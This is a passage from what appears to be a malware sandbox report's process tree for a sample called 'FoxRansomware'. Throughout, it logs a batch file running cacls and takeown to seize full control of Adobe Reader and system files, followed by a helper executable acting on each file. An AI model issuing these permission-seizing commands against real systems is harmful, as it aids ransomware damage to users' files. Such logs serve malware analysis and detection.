      D22bUU4y.exe -accepteula "main.css" -nobanner
      4⤵
      PID:5076
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:4332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:5084
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:4372
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:4400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:1592
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1732
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:3372
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:3432
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:3476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:3136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:3976
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:2608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:3640
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:3748
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:3872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    PID:3600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:4068
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:2320
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:5360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:3284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:3296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:5276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:5292
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:5340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:768
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:5424
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:5456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:5512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:5500
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:4312
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:5560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:668
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:700
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:460
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:1936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Modifies file permissions
    PID:5544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5144
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5128
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:5164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    - Modifies file permissions
    PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:2356
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:2008
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:5580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:2296
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:2380
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:1876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    - Modifies file permissions
    PID:336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:1764
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:4904
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    - Modifies file permissions
    PID:2072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:2204
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:2464
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:3024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:2288
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:2208
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:2636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:1668
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:2680
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:2892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:3240
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:3288
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:3160
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:3404
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:2916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:3528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:3272
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:4056
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:3428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:2768
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:4024
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    - Modifies file permissions
    PID:3156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:3084
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:2748
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:3152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:3676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Modifies file permissions
    PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner
    3⤵
    PID:2316
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1984
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:3660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4452
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4472
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:3384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\takeown.exe
